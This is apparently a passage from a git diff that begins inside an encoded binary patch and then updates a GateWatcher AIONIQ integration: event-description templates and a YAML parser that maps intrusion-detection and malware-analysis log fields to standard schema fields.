zi-%oO_mZp~aNA8@K0XzYH3dmiY~$@x^75V2ao3Sn@^WZX%q72qiyM=_b2T><#8W$&
zV$>IY{K$nP1C)Y=qqMy=$Fne`_Iv(xjj9>8y1!%t;JSzKeh%~AzGNGaGRvdJQ~U@6
z2R_at<s<u~{SB6HzO+*yZokVm<|V3zY0MwgsX}+v#BM6X=1l6B9bYfmMUGP%3(%P<
zZ)9cIdw9eHWbJ<V+izV!U}@@z#_b@ck9&FL<K9s5s$I+8CjOIC#n~t|Fpp3(XeIzJ
z5>(WumGxJd{_Mas(~EoeV9RW)zq~^>ZHLfZ@E%=!r(oMTo4azE>N$6#XL_sFk0$U<
za}8AmdXC!z-}Ilg2mQE<h_^6G{m`>foTn#_e@98%fn%+&&+#ITuAbYnMAPAbq3Dtk
z>DqL^QAKM=t%<dDt#9qodYqNzc5GP3;t?LoE0+6hOaQEJQ+95VyeYop8zzDqD*#JD
zKmN(iqGN9@0s*(}4qhpFh9BN5xcc|^%Wk1@a}#2fd%f3<8-ph5B<#af9>bPb?TO|o
zuZ!G(+s^pgvC2+1N<neYP&q4+tq#yW@|mQ*cFFG9ms?v`Mn}h>7UP%0wCjk<3E$0)
zIh`m5^};2C4M>UYcpMr5{Ws0?%&VM+io#SA<l3OXH1=b6B5alPigpJ(f0j~ThL|?3
z*Z^)zmU5M&X19P7qVY#IyiwI+<q2lbOG?BMlL4#d2ylH{ZGIM6^$)}!<HO$;HxdJ%
z5d4^4@EIS*K6@>E=q-pT`)edY#4^LSYtprvQJD3a)*T&bSw(YsYx#`1*Of-}ZJ&$P
z1+=uat)k^dt$N@8eYBs_o9l?d<d})ioRhOkSQ<E8QI7`xQ7ZQ<DuTHB<V3Zo*}1cp
zqu4rw`RnJ?x83^`S95ePu2t~v{(-RkJ&=gF>b>+3@<qoDk}DGzqZ&6;5zq*{!U{?{
z#0K{OqAU;9vvU$9Xb<v4Q_H<V^{b~F(vm&5zdEb7w79XrF;&%7H|CH8vz5_DX5EA2
za<<;|fW)bzmSDyzbTvRb0HPicYG$4n^Kix1PA%#vZj0(XTFR;W`7QPLH)zp{NR)^b
z>-J~&SexdD<QSAGM&!c>`RT69Cd|erL)D9K4}Vb|@Rx!a5@cLr^kZO9#S`vZMK4s4
zmFSjel(^PC1o@z9^EZ1azd5y4gr;RYKRaISlbrNww#RtegzLyDdDlc{UcwA9ew*xb
zv=R_K8_IpnM5N^UFTUJ^k)!3lqw5IeZ5^dn0bbuEeW_bII(_I^*fy_%HNY1IHnx=5
z?E;*@E`AE3Tcxdb_eWP$lZ&mE(o&er$uPowo9G4F^zHn{##7Gpo{Hta>?@D2j=rS}
zStz^&dIO6?Z#9~&{!xFF6vZyF4$^Q}c<5sgf$ym=VrA#&8N_Tv1P3o~#<nCr=1^O<
z_n3&ZV!ezZ>ekTWu?DN?5#IG{oX=IrQX9==Z_M&WmEkgh!BdgtRB$QU(2#vWKV@OT
z(ciy@EwHX}1X?H@o<@L9=NO5K?N4_(c^%C26LRND9NiqS6%YCb04%DR#ON%d?Vq4K
zHJ;}B7}^6Q1SsS&zEty_6|F+YgQ_n-@NvT*->{ae*hG)eFAdd)Z*~UDFE6a*7u0eY
zUA?%o-9{C-I2L@YDY@c7X+U;K)@PBviNL;0UWdf%%{x=QU$XdnU&(8h`7RgUu#K+u
zp0W7Df&oa8#?1}8uv-Rud6Cyef~W~krEJwr;ybqm9fOWK&1(UV6ICpp9e2*se5siy
zB`tlz-u@(h*J#f8p^9z7GQu4Fnp8UMA&tLsW(`%!71e6<-bON|{0=zepFV!%8Eu_p
zd97qsE2$n(S`;E|jJ6^N5e-91GudoZIXE~dpf}=tz@k{l?T(a3^AimJ1P?QpO5JzP
zGqF2RRP}6*raIr=6I6NMP#9lNcd&uxVX&GAIZL;_`qtb$4S<1k->>dL2g5;Vs^Y_6
z$1<ebeudSYPFBMcgl(ezTF-r=52T6-WMal~b<eES{y;YsDHYkF`E7f6N{dKbF@diG
zMx4VpCpRx-z<HK8v?*5pvRpZpZzPP?4v~E(!hXimu}t0e?&{Qs>dOA4u0q8#&`#J)
z{O(1z`H2@N41>9?DZ3S-@pn`Pl*mYgtMDuv<5ZVqZwYV|y;3p2r%10`^E&a9iO@`y
z?qvPsDIz3(F-NKkpBdmvsXn~lY8??)UMU%TcxTt}+AHg@rf4}SyNNw7=aD+d70HfS
zA(b-v-oO|CD2PMP)x8-i#xZVw2>v)$b6;~V1Dusk0FzxCmwRom1%9p%^v~CIh<g#y
zR*aB;pAFkm_2aHcR7bA#WQ*#_(~}GRi!MQ6j`%-cZKFB{IVpr+G&w=*)eoqQMn27)
zzKK3joG|BZ8XBN#5iu?pM&PuL9$6$Y`DEc3z3zL9ICdv|KsbMXlde+MQD*B}=4#1{
zI5;>!ylijdMA~t@?nz7upsJAgiV|)y7vY*tOm3w&lDleMb$(I$`F_RVz(6yZ=wfv=
z_~%62+*R%GXl3KK3Y?v~FIdZ+u-g%sN|Lw4XeoLs`kniEmd@iM233ZeP+^>!DN;Ss
ztf41bZY9ftW5(+I_7S_2t6Dbm*PlC5rAy=;{%ai}Gs?<DBJnB>#i9Qx9%%5U$nQ~A
z0nI)vMD&S@0YeJOvY3&?w5X@R7HSktOqHwfsxY0{`+ifIx=F5a^C9Fq_AGoV@PkV-
zEoSza0AhEdo;Y7ng;qdKvWA~><8Q4r?29)A^cF=cM-RG}m{qeLSH>zIZ9rQWA2CRn
zCFqyu+HdCIPRZ)j@?w%C?Mvm>znqX+zk$l-nRS;VVFXpVb%lygpR*lQaR!*rMRvaW
zfzrG7pe@)p?x4jl9PT$B(IOi5>sO@}WO_dDTxF-FK_vYWPZLk<mi1z{5ylHbJH>9<
z7g`q{V@xd}P=XeR$Cz{ga-45V?N3Y+GwzyOhmeiS*6r0Fk-j#!lrm;w-djSj&Qo_p
zg;3fb$)L^56S{fjg|QoBs(yWa71!7Xf2nE$_E3;a2Z|6JR1A$hA+f_zm@Rp06m@u*
zn(v$t`I9a`zu@w7W%>Fm+q36fEmO`^ABI0{WSH;Ev3cx%@^MY1PSwjPT3aZW*gyF4
zL}qPweV{^`w)rPLd`f?Wy40Xh7~xtDjxnai{Z&`~YVDPW)O>6)l2?>^X9or0iV0#V
zcm{!Z(3@`UVe_PL!BIT6`s|zL9<4t_8s&XTOj_aYxpKAH#uKVm_w#xdc+5;V!)%J@
zDYLqc5W`kep5fA0yVjCyjhl+bhx^oo4H~k`_?yR&(dJ)MJ2Lxd>I~iX{9hZTPTD+j
zX3KPb+$>Bmow=C6?=9TBYrAfS0yo_3(`v@vI?ntz<Yy7G7j?ATh}enXJ-}vVL1K-1
za=LeL>8L8Xg;5zLj5k}8d_JRZ5}A6%B{!#@8`Is*Sx(q)+&DoL;hIWQdl;CZ_%Udv
zjR6t36UuA1NG94zIYOS8tL+?1IeWiGcnv6WdtDJ(9J9=0#kltK@~}X6H>1@E;X0uL
z8dqXx;<N-smWhBBOm{U9n+Z1x^5O&T^mwe!tj}BI4LE|m?zH=nKPfRh9!*Ms6cACi
z9DQN2Djg?z4qKP2q{(^OA|p|CKyINH(=QeKRQA_Wlj$N5JQ(nDcJ^OpE$0l`j@Z3K
zV&a0%dxdpY!Cw~&O8rem*^*N{R#g>(n$s>EwQ;$|_07wBZi$xGH)QA)zNh4?g(Wwa
zTdZz;7hnV-@mr5<-z~h!TfMNo-}68zhLoUu#2b7g$nGiNLcQtN*{5%tw@F@=t17x+
z^D327@*|l{Q`Pql^8Acy?HR87tRQrUinb^k!*DbBtP`K7y3(ww#dEBNK*!9XoKG#a
z!OUHuVk*a3Rof^O(oV`n(<Mso``@417yuMM8AcsugM-LdY1QSGvd@Znen9~Qj9;J)
zT~80|cV)=1hkPt)Sy{C#-CW(IcP5%y-?g(OdRSeJs5CE}fy%&e`tG|o!+UJHFgExl
zTzC{tYsfp}cbHyKptN;2J@B{t^Yhoc3>)_fLQKn2=^T!dlQ)Am%E<9rLdL_3E@s=N
z73OJaGWRR~-u`=|foMu)RMA$?rvMcHx3cx)(~|h6`X|@pvy^AOG&F$Zg9IF7KuF?U
z`ZDXD)8g){?@a@HJ1ae^&E!djqO3_tuijrh4NYfQPlk2bZ$N?kEZt0fVMBX;v{J*D
z@EitVTh8+lW+fbMV>ZcJ-x6-}?8NrjNkJYMO$1Hxk1lRy(cM1t3ooF>cO*n?H8tZR
zFZ^pJ?w+cFtA3kVxKm&QTcq2TZVK?)owhwy__Fp(U2*XXl`IYL>C(8D0jay<?50!0
zz{q$n>5~4+-M3_^WpuRq&6^k5qO`QM42tA}NPi|`pq0<S%ZJ&HYG)vv4p^<HbqgI^
zK7Oj*9jl)6>u;Zp@rn$@G^Eb}YVJG3Ev_fZ#!<iIvL}()<yoFd9N$z3;PxDzJ+cMY
z26i92x??n+9JUS?Wlth_{F$mesNVwQ2WI3ICVwc^GylVqtVFE3REOwZalF0}W;mNI
zTU5o`yJNjg^_1CpD<`LCfbfThhd&m%aUbrQ*$p@X!0hnw;kzWOm8}gO^*#PYxI+)u
z@sc__FZKGRevN9)-oEOJT_9NJANn&4TdXblwpj26u2K09m*nN-gaRV#{EoEqC->Rh
zA7pSPW9*nRNCtS(YMb7{ol+{Dr`0@#+(Bb~8FVL@Vp}gIc0=8>E}qMc@n@r20V#ms
zEV}wiljvMc$nCMqsUIjn+%?5J)@_Q`#uxo_gzbkae!Cga8Gjp9G@M+%@^;n(D%o;{
zqew?T40u->iouswEs8rF?0zz+!pdx{tL#$cF9h;~FDDDzb;kJNi4qa@r<rlWaqSNo
zoJ?xX5>*n$WtN9om_NStuJ$`=?9oji=}=kT5JNFLo_9sm%EaGr2_qStnVKV?v$gn{
z-xhq@N9PGvqrMAVq0#&hp(sE-qbSa#0$m;Jx*iJkWDVJ0oNVZEeNg=6*tg|je~!;=
zE4NW77gOF8vbg47%PPh!ZAn44J>D=y+~`njZQ;SK6Qah#MRuL><>YT6<_@!=*uikv
z*ZHXW7gXq?)s?Us4Bu4+I0X4l8naxz6T^-Z9*pHG*;BEI7?cbXHNHX~HE)`~`<Vr|
zHv5=8MzR+6Y#9XnVBp06Oar_1wYRP-qVBXK6a4+8g!8g0T8x>_0!$enfBzq}bYXJq
zH}1`-32OMkYE|-YCp_&cc3N(pC>27Mvs(NG@3nJczdh6+B*tt^{m4NuRG%(PwD20|
zE*~<gAEZkI52tfQ_lXlRV=6siwJgkqHhwZh^P-n33Hq`mCbijXTVK;TA-v&6Zs>Ky
zr&tjuXzHR(u*huODLnz1<{M5=B<&kvl`?e-E0^!a*u|v)QDs}sRj~WA_+FaL!$Q{&
z=I^p?OLPJJ$V!!EmBL$-K}5x-_7?L<?D5x(mHs3!64-I6<<9t&0vsdKtB@B);e_zo
ztA%TKZSKu5{7;B7)ihl=SI&k<WS7s5ldXa~7MXx1#(Igsc7&y>7z$^yM)O9Kc%x8`
z^9!F>=ebXm@z4^nrqvW~Z{FtD{E+}t)fa;oglBqZ$sBiWBzHIc<7S8)=-=yq>+Q${
z#A><R_KVB*pB%PqjdOdC3uKAroH4@218xM8ycIhTj)mg3@iE*kpwG*4oDJ2;+;gLS
zwgo)G>0Y#pM36@dz`KVRYi9A@!LWZ!7iC7+_J~YEyWY$L6J!*=ePVF3I7H~Ho{**;
z8<3c7PR*)v%RJI7%R8%sy6z1LJT<kF0!C23<iyc1B>kGYl7mxS$M5y3{Sx5v>^1#P
zmTIcfqD=*u4fPr|%*I2Nf`d^n569CCgVTW>mkATasl6d9#hMP8aDfOXs3}t(>xPKi
zC6weXx8}#k4qsE_Zhjh7W4ptzIeVor?4p;G#M%h}H(Kv?uoxp@bgyj6G>ln*p5-WT
z=bX%VDn0UWr;wT&cu`2;L6f|{tPHahdV_kfAV~CT)U#p#VQxp=UcUwnuIaV;MHar&
zupL$>{@Y#<k^V9X1x;7WEh&r_D%YyRF{W@zSa-rki0oEhR>9rR$1$?R8@kE;vrQps
zI7kx<3ugJs^nG~!lTG07pEPO-8C!OdPv4)buoU1G{L62=Yv{@eQQR7k|7pknN}k4n
z@Ba#3j5Z7{{N;Z%I#+%3i$N)cXUsR?hoY}BfuEn7U_CIv?|R%R@SEXIQTFWw4g5d{
zZS`Xczx7Ce*XZVU0mDTz8G)~bPA83#vdt#@tZQdw*0Vlt&V&~?#DT2JWhzpBIJfZ(
zTwr>KMgxJa85gHjbQ4P<cadG>;5qO-dcnFb*Rm9f0oMjEQ?y#_z5ftxU1k?v<Dp)y
zZf>}r0I!T}!{My^wz*<qh>+eG@VxLCdG!1ndhk{6Q?xzT1xTy+;H_n`J!OwWda3bi
z=4u;bGTMnwL<S!rk7Ea*?;7TS6Bc?-4({}2zd=7-Z;Ap46)Y`^8ldh0#Gne{T7dfl
zi#aem*y9>7!efV7)$jkZE<B6*G?D=&z^n42ooMC=V};%o(#)muLlePdwV2<U`1IBr
zN0aBBr4b4!0MGQymy+C-UzE8p+yS!E%#)ZhRK(ur4KOM!kSNhe6!xhWUX-~IBs!3%
zBdj()<po9lKn>{CW;r=`-MTH_O?;jNXaSY`47l0xgg_b#N&MIm5%%w}<%s1@7TgIA
z+bzs&OWisw4?BK5Oq97=+_uMJ`qp$_T%sO>#c}@_$$(}HELLBcGH$-#KB<95fqCV2
zf;q3trW3_(;5b3qu;VPQvn?-VwCT%ueMd12D~x_(kaRI{kwB___=xkLmEi>XeR($A
zs2!0ZfDWm*NFZT|q<|JJl%{ir*H|_Z8D)RA9A#H%gvlr;H=MD*R&!^cNYZ(FpzuuN
z(HoGD@<9TrZ*26WX$x3+Yh_oYo+Sa!RgS+SYty^O4mF4{(}kcrSa5vCa?bTUPSGh-
zO2y<%?C}m^Si8rYp-(D-?I!zypZg-PgUZEmLdfn`lhleYF@fj)0g*&@1HVuSY37Fq
zCi?`?`VJ}3TU`I=X;bW~5y%%V4rr+HoiNsB+Vw`(nK;3{H7taT0c}SWJu$Cg`#MYj
zyQ6Vd7yecBHH_%P#$2*xOrlZym-rg!a=AuJ%x5Q{vOYghxzNM{jp_5EPJmZw41rkT
ziXN0sl#=@XeL|k{1cwFv&q#{J_K*fk10QNDVk=z$GbNd2lQLTX%Md^q_)x)HAuES2
z1PFq~Y9Rjed?u_CiDZEt@ZXdjSirx>z5oB$|2vrum7xIsp`l{?a|C>DscEB1RIHx-
E7i6}*$p8QV

diff --git a/GateWatcher/aioniq/_meta/smart-descriptions.json b/GateWatcher/aioniq/_meta/smart-descriptions.json
index 547bcc82e..6ef36657f 100644
--- a/GateWatcher/aioniq/_meta/smart-descriptions.json
+++ b/GateWatcher/aioniq/_meta/smart-descriptions.json
@@ -1,14 +1,14 @@
 [
   {
-    "value": "Infected payload {file.name} hosted on {url.domain} was blocked: {gatewatcher.malcore.detail_threat_found}",
+    "value": "{gatewatcher.event_type} checker: {gatewatcher.state} file: {file.name} hosted on {url.domain} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
     "conditions": [
       {
-        "field": "gatewatcher.type",
-        "value": "malcore"
+        "field": "gatewatcher.event_type",
+        "value": "malware"
       },
       {
-        "field": "gatewatcher.state",
-        "value": "Infected"
+        "field": "gatewatcher.type",
+        "value": "malcore"
       },
       {
         "field": "url.domain"
@@ -18,79 +18,69 @@
       },
       {
         "field": "source.address"
-      },
-      {
-        "field": "gatewatcher.malcore.detail_threat_found"
-      }
-    ],
-    "relationships": [
-      {
-        "source": "source.address",
-        "target": "url.domain",
-        "type": "connection was denied"
-      },
-      {
-        "source": "url.domain",
-        "target": "file.name",
-        "type": "host infected payload"
       }
     ]
   },
   {
-    "value": "Alert {rule.name} raised with severity {event.severity}",
+    "value": "GCenter stats",
     "conditions": [
       {
-        "field": "event.kind",
-        "value": "alert"
-      },
-      {
-        "field": "event.severity"
-      },
-      {
-        "field": "rule.name"
+        "field": "gatewatcher.event_type",
+        "value": "stats"
       }
-    ]
-  },
-  {
-    "value": "{file.name} originating from {url.domain} analyzed",
+     ]
+    },
+   {
+    "value": "Metadata: {gatewatcher.event_type} {source.ip}:{source.port} -> {destination.ip}:{destination.port}",
     "conditions": [
       {
-        "field": "gatewatcher.event_type",
-        "value": "fileinfo"
-      },
+        "field": "gatewatcher.type",
+        "value": "suricata"
+      }
+     ]
+    },
+   {
+    "value": "Metadata: {gatewatcher.event_type} on {network.protocol}: {file.name} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
       {
-        "field": "url.domain"
+        "field": "gatewatcher.type",
+        "value": "suricata"
       },
       {
-        "field": "file.name"
+        "field": "gatewatcher.event_type",
+        "value": "fileinfo"
       }
-    ]
-  },
-  {
-    "value": "{gatewatcher.event_type} connection from {source.address} to {url.domain}",
+     ]
+    },
+    {
+    "value": "{gatewatcher.type} alert {rule.name} on {network.protocol} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
     "conditions": [
       {
         "field": "gatewatcher.event_type",
-        "value": "http"
-      },
-      {
-        "field": "url.domain"
+        "value": "alert"
       },
       {
-        "field": "source.address"
+        "field": "gatewatcher.type",
+        "value": "suricata"
       }
-    ],
-    "relationships": [
+     ]
+    },
+    {
+    "value": "{gatewatcher.event_type} {gatewatcher.state} of type {gatewatcher.sub_type} detected ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
       {
-        "source": "source.address",
-        "target": "url.domain",
-        "type": "connected to"
-      },
+        "field": "gatewatcher.event_type",
+        "value": "shellcode"
+      }
+     ]
+    },
+    {
+    "value": "{gatewatcher.event_type} {gatewatcher.state} detected ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
       {
-        "source": "url.domain",
-        "target": "destination.address",
-        "type": "was resolved to"
+        "field": "gatewatcher.event_type",
+        "value": "powershell"
       }
-    ]
-  }
+     ]
+    }
 ]
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 068d97e08..58f96e058 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -1,109 +1,243 @@
-name: aioniq
+name: gatewatcher-aioniq-legacy-format
+ignored_values: null
 pipeline:
   - name: json_load
+    description: ''
+    filter: ''
     external:
       name: json.parse-json
+      properties:
+        input_field: '{{original.message}}'
+        output_field: message
   - name: parsed_date
+    description: ''
+    filter: ''
     external:
       name: date.parse
       properties:
-        input_field: "{{json_load.message.timestamp_analyzed}}"
+        input_field: '{{json_load.message.timestamp_analyzed}}'
         output_field: datetime
+        format: null
+        timezone: UTC
   - name: common
+    description: ''
+    filter: ''
+    external: null
   - name: malcore
+    description: ''
     filter: '{{json_load.message.type == "malcore"}}'
+    external: null
   - name: suricata
+    description: ''
     filter: '{{json_load.message.type == "suricata"}}'
-
+    external: null
+  - name: powershell
+    description: powershell
+    filter: ''
+    external: null
+  - name: shellcode
+    description: shellcode
+    filter: ''
+    external: null
+  - name: fileinfo
+    description: fileinfo
+    filter: ''
+    external: null
+  - name: dga
+    description: DGA
+    filter: ''
+    external: null
+  - name: retrohunt
+    description: Retrohunt
+    filter: ''
+    external: null
 stages:
   common:
     actions:
       - set:
-          source.ip: "{{json_load.message.src_ip}}"
-        filter: "{{json_load.message.src_ip | is_ipaddress}}"
-
+          source.ip: '{{json_load.message.src_ip}}'
+        filter: '{{json_load.message.src_ip | is_ipaddress}}'
+        name: set
       - set:
-          destination.ip: "{{json_load.message.dest_ip}}"
-        filter: "{{json_load.message.dest_ip | is_ipaddress}}"
-
+          destination.ip: '{{json_load.message.dest_ip}}'
+        filter: '{{json_load.message.dest_ip | is_ipaddress}}'
+        name: set
       - set:
-          "@timestamp": "{{parsed_date.datetime}}"
-          source.port: "{{json_load.message.src_port}}"
-          destination.port: "{{json_load.message.dest_port}}"
-          observer.name: "{{json_load.message.gcap}}"
-          observer.version: "0.2"
-          observer.hostname: "{{json_load.message.host}}"
-          observer.type: "firewall"
-          network.transport: "{{json_load.message.proto}}"
-          network.protocol: "{{json_load.message.app_proto}}"
-          gatewatcher.type: "{{json_load.message.type}}"
-          gatewatcher.state: "{{json_load.message.state}}"
-          gatewatcher.gcenter: "{{json_load.message.gcenter}}"
-          gatewatcher.gcap: "{{json_load.message.gcap}}"
-          gatewatcher.flow_id: "{{json_load.message.flow_id}}"
-          gatewatcher.timestamp_analyzed: "{{json_load.message.timestamp_analyzed}}"
-          gatewatcher.timestamp_detected: "{{json_load.message.timestamp_detected}}"
-          gatewatcher.event_type: "{{json_load.message.event_type}}"
-          event.category: ["network"]
-          event.type: ["info"]
-          event.severity: "{{json_load.message.severity}}"
+          '@timestamp': '{{parsed_date.datetime}}'
+          source.port: '{{json_load.message.src_port}}'
+          observer.name: '{{json_load.message.gcap}}'
+          observer.type: ids
+          event.category:
+            - network
+          event.severity: '{{json_load.message.severity}}'
+          destination.port: '{{json_load.message.dest_port}}'
+          gatewatcher.gcap: '{{json_load.message.gcap}}'
+          gatewatcher.type: '{{json_load.message.type}}'
+          network.protocol: '{{json_load.message.app_proto}}'
+          observer.version: '0.2'
+          gatewatcher.state: '{{json_load.message.state}}'
+          gatewatcher.stats: '{{json_load.message.stats}}'
+          network.transport: '{{json_load.message.proto}}'
+          observer.hostname: '{{json_load.message.host}}'
+          gatewatcher.flow_id: '{{json_load.message.flow_id}}'
+          gatewatcher.gcenter: '{{json_load.message.gcenter}}'
+          gatewatcher.payload: '{{json_load.message.payload}}'
+          gatewatcher.event_type: '{{json_load.message.event_type}}'
+          gatewatcher.payload_printable: '{{json_load.message.payload_printable}}'
+          gatewatcher.timestamp_analyzed: '{{json_load.message.timestamp_analyzed}}'
+          gatewatcher.timestamp_detected: '{{json_load.message.timestamp_detected}}'
+        filter: ''
+        name: set
       - set:
-          observer.mac: '["{{json_load.message.ether.src_mac}}", "{{json_load.message.ether.dest_mac}}"]'
-        filter: "{{json_load.message.ether != null}}"
-      - name: translate
-        dictionary:
-          alert: alert
-        mapping:
-          gatewatcher.event_type: event.kind
-        fallback: event
-
+          observer.mac: >-
+            ["{{json_load.message.ether.src_mac}}",
+            "{{json_load.message.ether.dest_mac}}"]
+        filter: '{{json_load.message.ether != null}}'
+        name: set
   malcore:
     actions:
       - set:
-          file.name: "{{json_load.message.fileinfo.filename}}"
-          file.size: "{{json_load.message.fileinfo.size}}"
-          file.hash.md5: "{{json_load.message.fileinfo.md5}}"
-          file.hash.sha256: "{{json_load.message.fileinfo.sha256}}"
-          url.path: "{{json_load.message.http.url}}"
-          url.domain: "{{json_load.message.http.hostname}}"
-          http.version: "{{json_load.message.http.version}}"
-          http.request.method: "{{json_load.message.http.http_method}}"
-          user_agent.original: "{{json_load.message.http.http_user_agent}}"
-          http.response.status_code: "{{json_load.message.http.status}}"
-          gatewatcher.retroact: "{{json_load.message.retroact}}"
-          gatewatcher.nb_rescans: "{{json_load.message.nb_rescans}}"
-          gatewatcher.malcore.code: "{{json_load.message.code|string}}"
-          gatewatcher.malcore.file: "{{json_load.message.file}}"
-          gatewatcher.malcore.magic: "{{json_load.message.magic}}"
-          gatewatcher.malcore.replica: "{{json_load.message.replica}}"
-          gatewatcher.reporting_token: "{{json_load.message.reporting_token}}"
-          gatewatcher.malcore.detail_threat_found: "{{json_load.message.detail_threat_found}}"
-          event.category: ["malware"]
-          event.type: ["info"]
-
+          url.path: '{{json_load.message.http.url}}'
+          file.name: '{{json_load.message.fileinfo.filename}}'
+          file.size: '{{json_load.message.fileinfo.size}}'
+          event.type:
+            - info
+          url.domain: '{{json_load.message.http.hostname}}'
+          http.version: '{{json_load.message.http.version}}'
+          file.hash.md5: '{{json_load.message.fileinfo.md5}}'
+          event.category:
+            - malware
+          file.hash.sha256: '{{json_load.message.fileinfo.sha256}}'
+          http.request.method: '{{json_load.message.http.http_method}}'
+          user_agent.original: '{{json_load.message.http.http_user_agent}}'
+          gatewatcher.fileinfo: '{{json_load.message.fileinfo}}'
+          gatewatcher.retroact: '{{json_load.message.retroact}}'
+          gatewatcher.nb_rescans: '{{json_load.message.nb_rescans}}'
+          gatewatcher.malcore.code: '{{json_load.message.code|string}}'
+          gatewatcher.malcore.file: '{{json_load.message.file}}'
+          gatewatcher.malcore.magic: '{{json_load.message.magic}}'
+          http.response.status_code: '{{json_load.message.http.status}}'
+          gatewatcher.malcore.replica: '{{json_load.message.replica}}'
+          gatewatcher.reporting_token: '{{json_load.message.reporting_token}}'
+          gatewatcher.malcore.detail_threat_found: '{{json_load.message.detail_threat_found}}'
+        filter: ''
+        name: set
   suricata:
     actions:
       - set:
-          source.bytes: "{{json_load.message.flow.bytes_toserver}}"
-          source.packets: "{{json_load.message.flow.pkts_toserver}}"
-          destination.bytes: "{{json_load.message.flow.bytes_toclient}}"
-          destination.packets: "{{json_load.message.flow.pkts_toclient}}"
-          url.path: "{{json_load.message.http.url}}"
-          url.domain: "{{json_load.message.http.hostname}}"
-          http.version: "{{json_load.message.http.version}}"
-          http.request.method: "{{json_load.message.http.http_method}}"
-          user_agent.original: "{{json_load.message.http.http_user_agent}}"
-          http.response.status_code: "{{json_load.message.http.status}}"
-          dns.id: "{{json_load.message.dns.id}}"
-          dns.type: "{{json_load.message.dns.type}}"
-          dns.question.name: "{{json_load.message.dns.rrname}}"
-          dns.question.type: "{{json_load.message.dns.rrtype}}"
-          rule.name: "{{json_load.message.alert.signature}}"
-          rule.id: "{{json_load.message.alert.signature_id|string}}"
-          rule.version: "{{json_load.message.alert.rule.version}}"
-          rule.category: "{{json_load.message.alert.category}}"
-          event.action: "{{json_load.message.alert.action}}"
-          file.name: "{{json_load.message.fileinfo.filename}}"
-          file.size: "{{json_load.message.fileinfo.size}}"
-          file.hash.md5: "{{json_load.message.fileinfo.md5}}"
-          file.hash.sha256: "{{json_load.message.fileinfo.sha256}}"
+          dns.id: '{{json_load.message.dns.id}}'
+          rule.id: '{{json_load.message.alert.signature_id|string}}'
+          dns.type: '{{json_load.message.dns.type}}'
+          url.path: '{{json_load.message.http.url}}'
+          file.name: '{{json_load.message.fileinfo.filename}}'
+          file.size: '{{json_load.message.fileinfo.size}}'
+          rule.name: '{{json_load.message.alert.signature}}'
+          url.domain: '{{json_load.message.http.hostname}}'
+          event.action: '{{json_load.message.alert.action}}'
+          http.version: '{{json_load.message.http.version}}'
+          rule.version: '{{json_load.message.alert.rule.version}}'
+          source.bytes: '{{json_load.message.flow.bytes_toserver}}'
+          file.hash.md5: '{{json_load.message.fileinfo.md5}}'
+          rule.category: '{{json_load.message.alert.category}}'
+          source.packets: '{{json_load.message.flow.pkts_toserver}}'
+          gatewatcher.ftp: '{{json_load.message.ftp}}'
+          gatewatcher.nfs: '{{json_load.message.nfs}}'
+          gatewatcher.rdp: '{{json_load.message.rdp}}'
+          gatewatcher.rfb: '{{json_load.message.rfb}}'
+          gatewatcher.rpc: '{{json_load.message.rpc}}'
+          gatewatcher.sip: '{{json_load.message.sip}}'
+          gatewatcher.smb: '{{json_load.message.smb}}'
+          gatewatcher.ssh: '{{json_load.message.ssh}}'
+          gatewatcher.tls: '{{json_load.message.tls}}'
+          file.hash.sha256: '{{json_load.message.fileinfo.sha256}}'
+          gatewatcher.dhcp: '{{json_load.message.dhcp}}'
+          gatewatcher.dnp3: '{{json_load.message.dnp3}}'
+          gatewatcher.krb5: '{{json_load.message.krb5}}'
+          gatewatcher.mqtt: '{{json_load.message.mqtt}}'
+          gatewatcher.smtp: '{{json_load.message.smtp}}'
+          gatewatcher.snmp: '{{json_load.message.snmp}}'
+          gatewatcher.tftp: '{{json_load.message.tftp}}'
+          destination.bytes: '{{json_load.message.flow.bytes_toclient}}'
+          dns.question.name: '{{json_load.message.dns.rrname}}'
+          dns.question.type: '{{json_load.message.dns.rrtype}}'
+          gatewatcher.http2: '{{json_load.message.http.http2}}'
+          gatewatcher.ikev2: '{{json_load.message.ikev2}}'
+          destination.packets: '{{json_load.message.flow.pkts_toclient}}'
+          http.request.method: '{{json_load.message.http.http_method}}'
+          user_agent.original: '{{json_load.message.http.http_user_agent}}'
+          gatewatcher.ftp_data: '{{json_load.message.ftp_data}}'
+          gatewatcher.smtp_email: '{{json_load.message.email}}'
+          http.response.status_code: '{{json_load.message.http.status}}'
+        filter: ''
+        name: set
+  powershell:
+    actions:
+      - set:
+          event.module: '{{json_load.message.sub_type}}'
+          gatewatcher.sample_id: '{{json_load.message.file_id}}'
+          gatewatcher.scores.analysis: '{{json_load.message.scores.analysis}}'
+          gatewatcher.scores.proba_obfuscated: '{{json_load.message.scores.proba_obfuscated}}'
+          gatewatcher.scores.analysis_detailed: '{{json_load.message.scores.analysis_detailed}}'
+        filter: ''
+        name: set
+  shellcode:
+    actions:
+      - set:
+          event.module: '{{json_load.message.event_type}}'
+          gatewatcher.calls: '{{json_load.message.calls}}'
+          gatewatcher.encodings: '{{json_load.message.encodings}}'
+          gatewatcher.sample_id: '{{json_load.message.sample_id}}'
+          gatewatcher.sub_type: '{{json_load.message.sub_type}}'
+        filter: ''
+        name: set
+  fileinfo:
+    actions:
+      - set:
+          gatewatcher.filemagic: '{{json_load.message.fileinfo.magic}}'
+        filter: ''
+        name: set
+  dga:
+    actions:
+      - set:
+          gatewatcher.type: '{{json_load.message.type}}'
+          gatewatcher.domain_name: '{{json_load.message.domain_name}}'
+          gatewatcher.probability: '{{json_load.message.probability}}'
+          gatewatcher.matched_event: '{{json_load.message.matched_event}}'
+        filter: ''
+        name: set
+  retrohunt:
+    actions:
+      - set:
+          gatewatcher.tlp: '{{json_load.message.tlp}}'
+          gatewatcher.ttp: '{{json_load.message.ttp}}'
+          gatewatcher.risk: '{{json_load.message.risk}}'
+          gatewatcher.ioc_id: '{{json_load.message.ioc_id}}'
+          gatewatcher.case_id: '{{json_load.message.case_id}}'
+          gatewatcher.families: '{{json_load.message.families}}'
